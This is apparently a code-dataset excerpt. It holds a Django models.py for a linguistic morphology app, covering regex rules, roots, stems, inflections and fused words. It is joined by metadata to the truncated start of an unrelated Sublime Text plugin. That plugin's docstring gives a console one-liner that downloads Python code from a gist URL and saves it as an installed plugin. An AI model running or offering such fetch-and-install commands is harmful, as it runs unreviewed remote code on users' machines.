RegexpReplacement(models.Model):\n    pattern=models.CharField(max_length=1024)\n    replacement=models.CharField(max_length=1024)\n\n    objects=RegexpReplacementManager()\n\n    class Meta:\n        ordering = [\"pattern\",\"replacement\"]\n        #unique_together = [ [\"pattern\",\"replacement\"] ]\n\n    def __str__(self):\n        return \"%s => %s\" % (self.pattern,self.replacement)\n\n    def apply(self,text):\n        q=re.sub(self.pattern,self.replacement,text)\n        return q\n\n    
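# e.g. (hypothetical): RegexpReplacement(pattern=\"(.+)are$\", replacement=\"\\\\1o\").apply(\"parlare\") -> \"parlo\"\n    def serialize(self):\n        ret={\n            \"pattern\": 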
self.pattern,\n \"replacement\": self.replacement,\n }\n \n if hasattr(self,\"reverse\"):\n ret[\"reverse\"]={\n \"pattern\": self.reverse.pattern,\n \"replacement\": self.reverse.replacement,\n }\n\n return ret\n\n class Meta:\n ordering = [\"pattern\",\"replacement\"]\n\n @cached_property\n def num_inflections(self): return self.inflection_set.count()\n\n @cached_property\n def num_derivations(self): return self.derivation_set.count()\n\n @cached_property\n def num_fusion_rules(self): return self.fusionrule_set.count()\n\n\nclass RegexpReverseManager(models.Manager):\n\n def _add_N0(self,target):\n rev,created=self.update_or_create(target=target,\n defaults={\n \"pattern\":target.replacement,\n \"replacement\":target.replacement\n })\n return rev\n\n def _add_N1(self,target):\n N=target.replacement.count('\\\\1')\n if N==0:\n print(\"N==0\",N,target)\n return None\n M=target.pattern.count(r'(')\n if M!=1:\n print(\"M!=1\",M,target)\n return None\n base=\"\"\n base_list=[ r'(.+)', r'(.+?)', r'(.)' ]\n for b in base_list:\n M=target.pattern.count(b)\n if M!=1: continue\n base=b\n break\n if not base:\n print(\"B \",base_list,target)\n return\n rev_pattern=target.replacement.replace(r'\\1',base)\n rev_replacement=target.pattern.replace(base,r'\\1')\n rev,created=self.update_or_create(target=target,\n defaults={\n \"pattern\":rev_pattern,\n \"replacement\":rev_replacement\n })\n return rev\n \n def _add_N2(self,target):\n N1=target.replacement.count('\\\\1')\n N2=target.replacement.count('\\\\2')\n if N1!=1 or N2!=1:\n print(\"N!=1\",N1,N2,target)\n return None\n\n if target.pattern not in [ '(.+)(.)', '(.)(.+)' ]:\n print(\"P2 \",target)\n\n if target.pattern=='(.+)(.)':\n rev_pattern=target.replacement.replace(r'\\1',r'(.+)').replace(r'\\2',r'(.)')\n else:\n rev_pattern=target.replacement.replace(r'\\2',r'(.+)').replace(r'\\1',r'(.)')\n\n rev_replacement=r'\\1\\2'\n rev,created=self.update_or_create(target=target,\n defaults={\n \"pattern\":rev_pattern,\n \"replacement\":rev_replacement\n })\n return rev\n \n def _add_N3(self,target):\n N1=target.replacement.count('\\\\1')\n N2=target.replacement.count('\\\\2')\n if N1>2 or N2>2:\n print(\"N!=2\",N1,N2,target)\n return None\n if target.pattern not in [ '(.+)(.)', '(.)(.+)' ]:\n print(\"P3 \",target)\n \n if target.pattern=='(.+)(.)':\n p1=r'(.+)'\n p2=r'(.)'\n else:\n p1=r'(.)'\n p2=r'(.+)'\n\n if N1==2:\n rev_pattern=target.replacement.replace(r'\\1\\1',r'%s\\1' % p1)\n rev_pattern=rev_pattern.replace(r'\\2',p2)\n else:\n rev_pattern=target.replacement.replace(r'\\2\\2',r'%s\\2' % p2)\n rev_pattern=rev_pattern.replace(r'\\1',p1)\n\n\n rev_replacement=r'\\1\\2'\n rev,created=self.update_or_create(target=target,\n defaults={\n \"pattern\":rev_pattern,\n \"replacement\":rev_replacement\n })\n return rev\n \n\n def add_reverse(self,target):\n N=target.replacement.count('\\\\')\n if N==0:\n rev=self._add_N0(target)\n return\n if N==1:\n rev=self._add_N1(target)\n return\n if N==2:\n rev=self._add_N2(target)\n return\n if N==3:\n rev=self._add_N3(target)\n return\n print(\"N>3 \",N,target)\n return\n\n\nclass RegexpReverse(models.Model):\n target=models.OneToOneField(RegexpReplacement,on_delete=models.CASCADE,related_name=\"reverse\")\n pattern=models.CharField(max_length=1024)\n replacement=models.CharField(max_length=1024)\n\n objects=RegexpReverseManager()\n\n def __str__(self):\n return \"%s => %s\" % (self.pattern,self.replacement)\n\nclass PartOfSpeech(base_models.AbstractName):\n bg_color = 
models.CharField(max_length=20,default=\"#ffff00\")\n    fg_color = models.CharField(max_length=20,default=\"#000000\")\n\n    def serialize(self):\n        return (self.name, {\n            \"bg_color\": self.bg_color,\n            \"fg_color\": self.fg_color,\n        })\n\n##### Tema\n \nclass TemaArgument(base_models.AbstractName):\n    @cached_property\n    def num_entries(self):\n        return self.temaentry_set.all().count()\n\n    \nclass TemaValue(base_models.AbstractName): \n    @cached_property\n    def num_entries(self):\n        return self.temaentry_set.all().count()\n\n    @cached_property\n    def temas(self):\n        T=\"\\r  • \".join([ d.name for d in Tema.objects.filter(temaentryrelation__entry__value=self).distinct() ])\n        return mark_safe(\"\\r    • \"+T+\"\\r
    \")\n\nclass TemaManager(models.Manager):\n def by_language(self,lang_pk):\n q_or=models.Q(root__language__pk=lang_pk)\n q_or=q_or|models.Q(derivation__language__pk=lang_pk)\n q_or=q_or|models.Q(fusionrule__fusionrulerelation__fusion__language__pk=lang_pk)\n return self.filter(q_or).distinct()\n \n def by_part_of_speech(self,part_of_speech):\n if type(part_of_speech) is str:\n pos=PartOfSpeech.objects.filter(name=part_of_speech)[0]\n else:\n pos=part_of_speech\n der_qset=Root.objects.filter(part_of_speech=pos).values(\"tema_obj\")\n return self.filter(pk__in=[ x[\"tema_obj\"] for x in der_qset ])\n\n def de_serialize(self,ser):\n name,data=ser\n tema,created=Tema.objects.get_or_create(name=name)\n ok=[]\n for k,v in data[name]:\n attr,created=TemaArgument.objects.get_or_create(name=k)\n val,created=TemaValue.objects.get_or_create(name=v)\n entry,created=TemaEntry.objects.get_or_create(argument=attr,value=val) #,tema=tema)\n entryrel,created=TemaEntryRelation.objects.get_or_create(tema=tema,entry=entry)\n ok.append(entryrel.pk)\n TemaEntryRelation.objects.filter(tema=tema).exclude(pk__in=ok).delete()\n return tema\n\nclass Tema(base_models.AbstractName):\n objects = TemaManager()\n\n class Meta:\n ordering = [ \"name\" ]\n \n def _multidict(self,tlist):\n D={}\n for k,v in tlist:\n if k not in D: \n D[k]=v\n continue\n if type(D[k]) is not set:\n D[k]=set( [D[k]] )\n D[k].add(v)\n return D\n\n def get_absolute_url(self):\n return \"/morphology/tema/%d/\" % self.pk\n \n def build(self):\n kwargs=self._multidict( [ (str(e.argument), str(e.value)) for e in self.temaentryrelation_set.all() ])\n return descriptions.Tema(**kwargs)\n\n def serialize(self):\n return (self.name, [ (str(e.argument), str(e.value)) for e in self.temaentryrelation_set.all() ] ) \n\n @cached_property\n def num_entries(self):\n return self.temaentryrelation_set.all().count()\n \n @cached_property\n def num_roots(self):\n return self.root_set.all().count()\n\n @cached_property\n def num_derivations(self):\n qs_der=Derivation.objects.filter(tema_entry__in=self.temaentryrelation_set.all().values(\"entry\"))\n return qs_der.count()\n\n @cached_property\n def num_fusion_rules(self):\n return self.fusionrule_set.all().count()\n\n @cached_property\n def num_references(self):\n return self.num_roots+self.num_fusion_rules #+self.num_derivations\n\n @cached_property\n def derivations(self):\n qs_der=Derivation.objects.filter(tema_entry__in=self.temaentryrelation_set.all().values(\"entry\"))\n return \"; \".join([ d.name for d in qs_der ])\n\n @cached_property\n def roots(self):\n return \"; \".join([ r.root for r in self.root_set.all() ])\n\nclass TemaEntry(models.Model):\n #tema = models.ForeignKey(Tema,on_delete=models.CASCADE) \n argument = models.ForeignKey(TemaArgument,on_delete=models.CASCADE) \n value = models.ForeignKey(TemaValue,on_delete=models.CASCADE) \n\n def __str__(self):\n return \"%s=%s\" % (str(self.argument),str(self.value))\n\n class Meta:\n ordering=[\"argument\",\"value\"]\n unique_together=[ [\"argument\",\"value\"] ]\n\n @cached_property\n def num_temas(self): return self.temaentryrelation_set.count()\n\n @cached_property\n def num_derivations(self): return self.derivation_set.count()\n\nclass TemaEntryRelation(models.Model):\n tema = models.ForeignKey(Tema,on_delete=models.CASCADE) \n entry = models.ForeignKey(TemaEntry,on_delete=models.CASCADE) \n\n def __str__(self):\n return str(self.entry)\n\n class Meta:\n ordering=[\"entry\"]\n\n @cached_property\n def argument(self): return 
self.entry.argument\n\n @cached_property\n def value(self): return self.entry.value\n\n\n#####\n \nclass ParadigmaManager(models.Manager):\n def by_language(self,lang_pk):\n return self.filter(language__pk=lang_pk)\n\nclass Paradigma(base_models.AbstractName):\n part_of_speech = models.ForeignKey(PartOfSpeech,on_delete=models.PROTECT) \n language = models.ForeignKey('languages.Language',on_delete=models.PROTECT) \n inflections = models.ManyToManyField(\"Inflection\",blank=True)\n\n objects=ParadigmaManager()\n\n class Meta:\n ordering = [\"name\"]\n\n def get_absolute_url(self):\n return \"/morphology/paradigma/%d/\" % self.pk\n\n @cached_property\n def count_roots(self):\n return Root.objects.filter(stem__derivation__paradigma=self).distinct().count()\n\n @cached_property\n def count_words(self):\n return Word.objects.filter(stem__derivation__paradigma=self).distinct().count()\n\n @cached_property\n def count_stems(self):\n return Stem.objects.filter(derivation__paradigma=self).distinct().count()\n\n @cached_property\n def count_derivations(self):\n return self.derivation_set.count()\n\n @cached_property\n def count_inflections(self):\n return self.inflections.count()\n\n def split_inflections(self,arg_list):\n\n qset=Inflection.objects.filter(paradigma=self)\n kwargs={}\n for k in arg_list:\n kwargs[k]= models.Max(\"description_obj__entries__value__string\",filter=models.Q(description_obj__entries__attribute__name=k))\n qset=qset.annotate(**kwargs)\n\n ret={}\n for infl in qset:\n key=tuple( [ x if x is not None else \"-\" for x in [ getattr(infl,k) for k in arg_list ] ])\n print(key)\n if key not in ret: ret[key]=[]\n ret[key].append(infl)\n return ret\n\nclass Inflection(models.Model):\n dict_entry = models.BooleanField(default=False)\n regsub = models.ForeignKey(RegexpReplacement,on_delete=models.PROTECT) \n description_obj = models.ForeignKey(base_models.Description,on_delete=models.PROTECT)\n\n class Meta:\n ordering = [\"regsub\"]\n\n @cached_property\n def description(self):\n return self.description_obj.build()\n\n def __str__(self):\n if not self.dict_entry:\n return \"%s [%s]\" % (self.regsub,self.description)\n return \"%s [%s] [DICT]\" % (self.regsub,self.description)\n\n @cached_property\n def num_paradigmas(self):\n return self.paradigma_set.count()\n\n def serialize(self):\n return {\n \"dict_entry\": self.dict_entry,\n \"regsub\": self.regsub.serialize(),\n \"description\": self.description_obj.name\n }\n\nclass RootManager(models.Manager):\n\n def de_serialize(self,ser):\n try:\n obj,created=Root.objects.get_or_create(root=ser[\"root\"],\n part_of_speech=ser[\"part_of_speech\"],\n tema_obj=ser[\"tema\"],\n language=ser[\"language\"])\n except Exception as e:\n print(ser)\n raise e\n return obj\n\n def by_language(self,lang_pk):\n return self.filter(language__pk=lang_pk)\n\n def _clean_fused(self,language,root_list=None):\n if root_list is None:\n FusedWordRelation.objects.filter(fused_word__fusion__language=language).delete()\n FusedWord.objects.filter(fusion__language=language).delete()\n return\n fword_list=list(FusedWord.objects.filter(fusedwordrelation__word__stem__root__in=root_list))\n FusedWordRelation.objects.filter(fused_word__in=fword_list).delete()\n for fword in fword_list:\n fword.delete()\n\n def _rebuild_fused(self,language,root_list=None):\n if root_list is None:\n FusedWord.objects.rebuild(language)\n return\n qset=Word.objects.filter(stem__root__in=root_list)\n qset=qset.values(\"inflection__paradigma__part_of_speech\")\n 
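# keep one row per distinct part of speech used by these words\n        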
qset=qset.order_by(\"inflection__paradigma__part_of_speech\").distinct()\n fpk_qset=FusionRuleRelation.objects.filter(fusion_rule__part_of_speech__in=qset)\n fpk_qset=fpk_qset.values(\"fusion__pk\")\n fusion_list=Fusion.objects.filter(pk__in=fpk_qset)\n FusedWord.objects.rebuild(language,fusion_list=fusion_list)\n \n def clean_derived_tables(self,language,root_names):\n if root_names:\n root_list=self.filter(language=language,root__in=root_names)\n self._clean_fused(language,root_list)\n else:\n root_list=self.filter(language=language)\n self._clean_fused(language)\n Word.objects.filter(stem__root__in=root_list).delete()\n Stem.objects.filter(root__in=root_list).delete()\n\n def update_derived_tables(self,language,root_names=[],fused=True):\n if not root_names:\n root_list=self.filter(language=language)\n queryset_word=Word.objects.filter(stem__root__language=language)\n queryset_stem=Stem.objects.filter(root__language=language)\n if fused: self._clean_fused(language)\n else:\n root_list=self.filter(language=language,root__in=root_names)\n queryset_word=Word.objects.filter(stem__root__language=language,\n stem__root__in=root_list)\n queryset_stem=Stem.objects.filter(root__language=language,\n root__in=root_list)\n if fused: self._clean_fused(language,root_list)\n\n # phase 1. stems\n der_list=Derivation.objects.filter(language=language)\n ok=[]\n for root in root_list:\n print(\"R\",root,\"(%s)\" % root.part_of_speech)\n for der in der_list:\n if root.part_of_speech != der.root_part_of_speech: continue\n if not (der.tema <= root.tema): continue\n #if not (der.root_description <= root.description): continue\n stem,created=Stem.objects.get_or_create(root=root,derivation=der)\n stem.clean()\n stem.save()\n ok.append(stem.pk)\n queryset_word.exclude(stem__pk__in=ok).delete()\n queryset_stem.exclude(pk__in=ok).delete()\n \n # phase 2. words\n stem_list=queryset_stem.all()\n #par_list=Paradigma.objects.filter(language=language)\n \n ok=[]\n for stem in stem_list:\n print(\" S\",stem,\"(%s)\" % stem.part_of_speech)\n for infl in stem.paradigma.inflections.all():\n word,created=Word.objects.get_or_create(stem=stem,inflection=infl)\n word.clean()\n word.save()\n print(\" W %-20.20s %s\" % (str(word),str(word.description)))\n ok.append(word.pk)\n queryset_word.exclude(pk__in=ok).delete()\n\n # phase 3. 
fused words\n\n if not fused: return\n\n if not root_names:\n self._rebuild_fused(language)\n return\n self._rebuild_fused(language,root_list)\n\n\nclass Root(models.Model):\n root=models.CharField(max_length=1024)\n language = models.ForeignKey('languages.Language',on_delete=models.PROTECT) \n tema_obj = models.ForeignKey(Tema,on_delete=models.PROTECT) \n part_of_speech = models.ForeignKey(PartOfSpeech,on_delete=models.PROTECT) \n # description_obj = models.ForeignKey(base_models.Description,on_delete=models.PROTECT) \n\n objects=RootManager()\n\n class Meta:\n ordering = [\"root\"]\n unique_together = [ [\"language\",\"root\",\"tema_obj\",\"part_of_speech\"] ] #,\"description_obj\"] ]\n\n def __str__(self):\n return \"%s (%s)\" % (self.root,self.part_of_speech)\n\n # @cached_property\n # def description(self):\n # return self.description_obj.build()\n\n @cached_property\n def tema(self):\n return self.tema_obj.build()\n\n def serialize(self):\n return {\n \"root\": self.root,\n \"tema\": self.tema_obj.name,\n # \"description\": self.description_obj.name,\n \"part_of_speech\": self.part_of_speech.name,\n }\n\n def get_absolute_url(self):\n return \"/morphology/root/%d/\" % self.pk\n\n def update_derived(self):\n queryset_word=Word.objects.filter(stem__root=self)\n queryset_stem=Stem.objects.filter(root=self)\n\n # phase 1. stems\n der_list=Derivation.objects.filter(language=self.language,\n root_part_of_speech=self.part_of_speech)\n ok=[]\n for der in der_list:\n if not (der.tema <= self.tema): continue\n #if not (der.root_description <= self.description): continue\n stem,created=Stem.objects.get_or_create(root=self,derivation=der)\n stem.clean()\n stem.save()\n print(\"S\",stem)\n ok.append(stem.pk)\n queryset_word.exclude(stem__pk__in=ok).delete()\n queryset_stem.exclude(pk__in=ok).delete()\n \n # phase 2. words\n stem_list=queryset_stem.all()\n ok=[]\n for stem in stem_list:\n for infl in stem.paradigma.inflections.all():\n word,created=Word.objects.get_or_create(stem=stem,inflection=infl)\n word.clean()\n word.save()\n print(\"W\",word)\n ok.append(word.pk)\n queryset_word.exclude(pk__in=ok).delete()\n\n # phase 3. 
fused words\n\n #FusedWord.objects.rebuild(language)\n \nclass DerivationManager(models.Manager):\n def by_language(self,lang_pk):\n return self.filter(language__pk=lang_pk)\n\n def de_serialize(self,ser):\n language,name,data=ser\n defaults={}\n for k in [ \"regsub\",\"root_part_of_speech\",\"paradigma\" ]:\n defaults[k]=data[k]\n # for k in [ \"tema\",\"description\" ]:\n for k in [ \"description\" ]:\n defaults[k+\"_obj\"]=data[k]\n\n a,v=data[\"tema_entry\"]\n attr,created=TemaArgument.objects.get_or_create(name=a)\n val,created=TemaValue.objects.get_or_create(name=v)\n entry,created=TemaEntry.objects.get_or_create(argument=attr,value=val) #,tema=tema)\n defaults[\"tema_entry\"]=entry\n der,created=Derivation.objects.update_or_create(name=name,language=language,\n defaults=defaults)\n return der\n\n\nclass Derivation(base_models.AbstractName):\n language = models.ForeignKey('languages.Language',on_delete=models.PROTECT) \n regsub = models.ForeignKey(RegexpReplacement,on_delete=models.PROTECT) \n # tema_obj = models.ForeignKey(Tema,on_delete=models.PROTECT) \n tema_entry = models.ForeignKey(TemaEntry,on_delete=models.PROTECT) \n description_obj = models.ForeignKey(base_models.Description,on_delete=models.PROTECT) \n # root_description_obj = models.ForeignKey(base_models.Description,\n # on_delete=models.PROTECT,\n # related_name=\"root_derivation_set\") \n root_part_of_speech = models.ForeignKey(PartOfSpeech,on_delete=models.PROTECT) \n paradigma = models.ForeignKey(Paradigma,on_delete=models.PROTECT)\n\n objects=DerivationManager()\n\n class Meta:\n ordering = ['name']\n\n def serialize(self):\n return (self.name,{\n \"regsub\": self.regsub.serialize(),\n # \"tema\": self.tema_obj.name,\n \"description\": self.description_obj.name,\n # \"root_description\": self.root_description_obj.name,\n \"root_part_of_speech\": self.root_part_of_speech.name,\n \"paradigma\": self.paradigma.name,\n \"tema_entry\": ( str(self.tema_entry.argument), str(self.tema_entry.value) )\n })\n\n @cached_property\n def num_stem(self):\n return self.stem_set.count()\n\n @cached_property\n def description(self):\n return self.description_obj.build()\n\n @cached_property\n def part_of_speech(self):\n return self.paradigma.part_of_speech\n\n # @cached_property\n # def root_description(self):\n # return self.root_description_obj.build()\n\n @cached_property\n def tema(self):\n kwargs=dict( [ (str(self.tema_entry.argument), str(self.tema_entry.value)) ])\n return descriptions.Tema(**kwargs)\n\n # @cached_property\n # def num_tema_entries(self):\n # return self.tema_obj.num_entries\n\n def clean(self):\n if self.language != self.paradigma.language:\n raise ValidationError(_('Paradigma and language are not compatible.'))\n\n def get_absolute_url(self):\n return \"/morphology/derivation/%d/\" % self.pk\n\nclass FusionManager(models.Manager):\n def by_language(self,lang_pk):\n return self.filter(language__pk=lang_pk)\n \nclass Fusion(base_models.AbstractName):\n language = models.ForeignKey('languages.Language',on_delete=models.PROTECT) \n objects=FusionManager()\n\nclass FusionRule(base_models.AbstractName):\n regsub = models.ForeignKey(RegexpReplacement,on_delete=models.PROTECT) \n tema_obj = models.ForeignKey(Tema,on_delete=models.PROTECT) \n part_of_speech = models.ForeignKey(PartOfSpeech,on_delete=models.PROTECT) \n description_obj = models.ForeignKey(base_models.Description,on_delete=models.PROTECT) \n\n @cached_property\n def description(self):\n return self.description_obj.build()\n\n @cached_property\n def 
tema(self):\n return self.tema_obj.build()\n\n @cached_property\n def num_fusions(self):\n return self.fusionrulerelation_set.all().count()\n \n def serialize(self):\n return {\n \"name\": self.name,\n \"regsub\": self.regsub.serialize(),\n \"tema\": self.tema_obj.name,\n \"description\": self.description_obj.name,\n \"part_of_speech\": self.part_of_speech.name,\n }\n\n\nclass FusionRuleRelation(models.Model):\n fusion = models.ForeignKey(Fusion,on_delete=models.CASCADE) \n fusion_rule = models.ForeignKey(FusionRule,on_delete=models.CASCADE) \n order = models.IntegerField()\n\n def __str__(self):\n return \"%s/%s(%d)\" % (self.fusion,self.fusion_rule,self.order) \n\n class Meta:\n ordering = [ \"order\" ]\n\nclass StemManager(models.Manager):\n def by_language(self,lang_pk):\n return self.filter(root__language__pk=lang_pk)\n\nclass Stem(models.Model):\n root = models.ForeignKey(Root,on_delete=models.CASCADE) \n derivation = models.ForeignKey(Derivation,on_delete=models.CASCADE) \n cache=models.CharField(max_length=1024,db_index=True,editable=False)\n\n objects=StemManager()\n \n class Meta:\n ordering = [\"cache\"]\n\n def __str__(self): return self.cache\n\n def clean(self):\n if self.root.language != self.derivation.language:\n raise ValidationError(_('Root and derivation are not compatible (language).'))\n if self.root.part_of_speech != self.derivation.root_part_of_speech:\n raise ValidationError(_('Root and derivation are not compatible (part of speech).'))\n dtema=self.derivation.tema\n rtema=self.root.tema\n if not dtema<=rtema: \n raise ValidationError(_('Root and derivation are not compatible (tema).'))\n # ddesc=self.derivation.root_description\n # rdesc=self.root.description\n # if not ddesc<=rdesc: \n # raise ValidationError(_('Root and derivation are not compatible (description).'))\n # if self.status == 'published' and self.pub_date is None:\n # self.pub_date = datetime.date.today()\n self.cache=self.derivation.regsub.apply(self.root.root)\n\n \n @cached_property\n def description(self): return self.derivation.description\n # ddesc=self.derivation.description\n # #rdesc=self.root.description\n # return ddesc+rdesc\n\n @cached_property\n def stem(self): return self.cache\n\n @cached_property\n def tema(self): return self.root.tema\n\n @cached_property\n def paradigma(self): return self.derivation.paradigma\n\n @cached_property\n def language(self): return self.derivation.language\n\n @cached_property\n def part_of_speech(self): return self.derivation.paradigma.part_of_speech\n\n @cached_property\n def dictionary_voice(self):\n return \", \".join([str(w) for w in self.word_set.filter(inflection__dict_entry=True)])\n \nclass WordManager(models.Manager): pass\n\nclass Word(models.Model):\n stem = models.ForeignKey(Stem,on_delete=models.CASCADE) \n inflection = models.ForeignKey(Inflection,on_delete=models.CASCADE) \n cache=models.CharField(max_length=1024,db_index=True,editable=False)\n\n objects=WordManager()\n\n class Meta:\n ordering = [ \"cache\" ]\n\n def __str__(self): return self.cache\n\n def clean(self):\n if not self.inflection in self.stem.paradigma.inflections.all():\n raise ValidationError(_('Stem and inflection are not compatible (inflection not in paradigma).'))\n self.cache=self.inflection.regsub.apply(self.stem.stem)\n\n @cached_property\n def description(self):\n try:\n idesc=self.inflection.description\n sdesc=self.stem.description\n return idesc+sdesc\n except descriptions.FailedUnification as e:\n return descriptions.Description(failed=str(e))\n\n 
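These model classes lean heavily on `@cached_property` for derived attributes. The import is not visible in this excerpt; the models presumably use Django's `django.utils.functional.cached_property`, but the standard-library `functools` version behaves the same way for read-only attributes like `tema` and `description`: computed on first access, then stored on the instance.

```python
# functools.cached_property computes the value once per instance and caches
# it in the instance's __dict__; later accesses skip the method entirely.
from functools import cached_property

class Demo:
    calls = 0

    @cached_property
    def expensive(self):
        Demo.calls += 1
        return sum(range(1_000))

d = Demo()
print(d.expensive == d.expensive)  # True: second access hits the cache
print(Demo.calls)                  # 1
```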
@cached_property\n def tema(self): return self.stem.tema\n\n @cached_property\n def part_of_speech(self): return self.stem.part_of_speech\n \n @cached_property\n def dict_entry(self): return self.inflection.dict_entry\n\n @cached_property\n def paradigma(self): return self.stem.paradigma\n\n @cached_property\n def language(self): return self.stem.language\n\n\nclass FusedWordManager(models.Manager):\n\n\n ### QUI\n def _reduce_word_list(self,part_of_speech,tema,description):\n \"\"\" This function is just a performance booster, not a perfect filter,\n and retrieves more words than necessary (but still not all\n words).\n \"\"\"\n\n qset=Word.objects.filter(stem__derivation__paradigma__part_of_speech=part_of_speech) \n for arg in tema:\n if tema[arg] not in [list,set]:\n qtentry=TemaEntryRelation.objects.filter(entry__argument__name=arg,entry__value__name=tema[arg])\n qset=qset.filter(stem__root__tema_obj__in=[x[\"tema\"] for x in qtentry.values(\"tema\")])\n continue\n for val in tema[arg]:\n qtentry=TemaEntryRelation.objects.filter(entry__argument__name=arg,entry__value__name=val)\n qset=qset.filter(stem__root__tema_obj__in=[x[\"tema\"] for x in qtentry.values(\"tema\")])\n\n for arg in description:\n if isinstance(description[arg],descriptions.Description): continue\n if type(description[arg]) is tuple:\n if description[arg][1]: continue\n val=description[arg][0]\n else:\n val=description[arg]\n qentry=base_models.Entry.objects.filter( models.Q(attribute__name=arg,\n value__string=val,invert=False) )\n desc_list=[x[\"description\"] for x in qentry.values(\"description\")] \n # query= models.Q(stem__derivation__description_obj__in=desc_list) | \\\n # models.Q(stem__root__description_obj__in=desc_list) | \\\n # models.Q(inflection__description_obj__in=desc_list) \n query= models.Q(stem__derivation__description_obj__in=desc_list) | \\\n models.Q(inflection__description_obj__in=desc_list) \n qset=qset.filter(query)\n return qset\n\n\n def rebuild(self,language,fusion_list=[]):\n # FusedWordRelation.objects.filter(fused_word__fusion__language=language).delete()\n # self.filter(fusion__language=language).delete()\n # fusion_list=Fusion.objects.filter(language=language)\n if not fusion_list:\n fusion_list=Fusion.objects.filter(language=language)\n\n FusedWordRelation.objects.filter(fused_word__fusion__in=fusion_list).delete()\n self.filter(fusion__in=fusion_list).delete()\n\n ok=[]\n for fusion in fusion_list:\n print(fusion)\n comp=[]\n abort=False\n for rel in fusion.fusionrulerelation_set.all().order_by(\"order\"):\n rule=rel.fusion_rule\n word_list=self._reduce_word_list(rule.part_of_speech,rule.tema,rule.description)\n w_comp=[]\n print(\" rule %s: tema=%s, description=%s\" % (rule,str(rule.tema),str(rule.description) ) )\n print(\" \",word_list)\n for w in word_list:\n if not (rule.tema <= w.tema): continue\n if not (rule.description <= w.description): continue\n w_comp.append(w)\n if not w_comp:\n abort=True\n break\n comp.append( w_comp )\n if abort: continue\n\n comp=combine(comp)\n for w_list in comp:\n print(\" F:\",w_list)\n fword=FusedWord(fusion=fusion)\n fword.save()\n n=0\n for w in w_list:\n fwrel=FusedWordRelation(fused_word=fword,word=w,order=n)\n fwrel.full_clean()\n fwrel.save()\n n+=1\n fword.full_clean()\n fword.save()\n print(\" = %20s\" % fword)\n\nclass FusedWord(models.Model):\n fusion = models.ForeignKey(Fusion,on_delete=models.CASCADE) \n cache = models.CharField(max_length=1024,db_index=True,editable=False)\n objects=FusedWordManager()\n\n def clean(self):\n 
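The `rebuild` method above calls a `combine(comp)` helper that is not defined in this excerpt. From its use (one candidate list per fusion rule in, one flat list of word tuples out), it plausibly forms the cartesian product of the per-rule word lists. A hypothetical equivalent built on `itertools.product`:

```python
# Hypothetical stand-in for the combine() helper used in rebuild() above:
# every way of picking one word per rule yields one candidate fused word.
from itertools import product

def combine(lists_of_words):
    return [list(choice) for choice in product(*lists_of_words)]

comp = [["cat", "dog"], ["-s", "-let"]]
print(combine(comp))
# [['cat', '-s'], ['cat', '-let'], ['dog', '-s'], ['dog', '-let']]
```

Note the multiplicative growth: with many matching words per rule, the product (and hence the number of `FusedWord` rows) can get large quickly.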
S=\"\"\n n=0\n for word in [ rel.word for rel in self.fusedwordrelation_set.all().order_by(\"order\") ]:\n rule=self.rules[n]\n #print(\" \",word,rule)\n res=rule.regsub.apply(word.cache)\n print(\" W %20s %20s %20s\" % (word.cache,rule.regsub,res) )\n S+=res\n n+=1\n self.cache=S\n\n def __str__(self): return self.cache\n\n @cached_property\n def rules(self):\n return [ rel.fusion_rule for rel in self.fusion.fusionrulerelation_set.all().order_by(\"order\") ]\n\n @cached_property\n def words(self):\n return [ rel.word for rel in self.fusedwordrelation_set.all().order_by(\"order\") ]\n \n @cached_property\n def description(self): return [ w.description for w in self.words ]\n\n @cached_property\n def tema(self): return [ w.tema for w in self.words ]\n\n @cached_property\n def part_of_speech(self): return [ w.part_of_speech for w in self.words ]\n \n @cached_property\n def language(self): return self.fusion.language\n\n\nclass FusedWordRelation(models.Model):\n fused_word = models.ForeignKey(FusedWord,on_delete=models.CASCADE) \n word = models.ForeignKey(Word,on_delete=models.CASCADE) \n order = models.IntegerField()\n\n def __str__(self):\n return \"%s/%s\" % (self.fused_word.cache,self.word.cache)\n\n def clean(self):\n if self.word.language != self.fused_word.language:\n raise ValidationError(_('Fused word and word are not compatible (language).'))\n rule=self.fused_word.rules[self.order]\n if self.word.part_of_speech != rule.part_of_speech:\n raise ValidationError(_('Rule %d and word are not compatible (part of speech).' % self.order))\n dtema=rule.tema\n rtema=self.word.tema\n if not dtema<=rtema: \n raise ValidationError(_('Rule %d and word are not compatible (tema).' % self.order ))\n ddesc=rule.description\n rdesc=self.word.description\n if not ddesc<=rdesc: \n raise ValidationError(_('Rule %d and word are not compatible (description).' % self.order ))\n\n @cached_property\n def description(self): self.word.description\n\n @cached_property\n def tema(self): return self.word.tema\n\n @cached_property\n def part_of_speech(self): return self.word.part_of_speech\n \n @cached_property\n def language(self): return self.word.language\n","repo_name":"chiara-paci/clotilde","sub_path":"clotildecore/morphology/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":35763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33976693876","text":"# CSW: ignore\nfrom __future__ import print_function, division\nimport sublime\nimport sublime_plugin\nimport os.path\n\n\n\nclass EditSettingsCommand:\n\n def run(self, base_file, user_file=None, default=None):\n\n \"\"\"\n This command is here to help. But it is not the official one, because it uses\n features only available on ST3. So, there might be bugs, and its behavior\n might be different (although I tried to keep it the same)\n\n So, please: Consider swapping for Sublime Text **3**\n\n ## How do I install this?\n\n Easy: paste this into the sublime text console (view -> show console):\n\n for Sublime Text **3**\n\n import os.path,urllib.request,sublime;save_to=os.path.join(sublime.packages_path(),'User','settings.py');page=urllib.request.urlopen('https://gist.githubusercontent.com/math2001/6cd5cbb9d2741654c2e994d33c395729/raw/70ee7e80e1e555990416e57576c1c01c194809f5/settings.py');code=page.read().decode('utf-8');file=open(save_to,'w');file.write(code);file.close();print(\"Voila! Everything's done. 
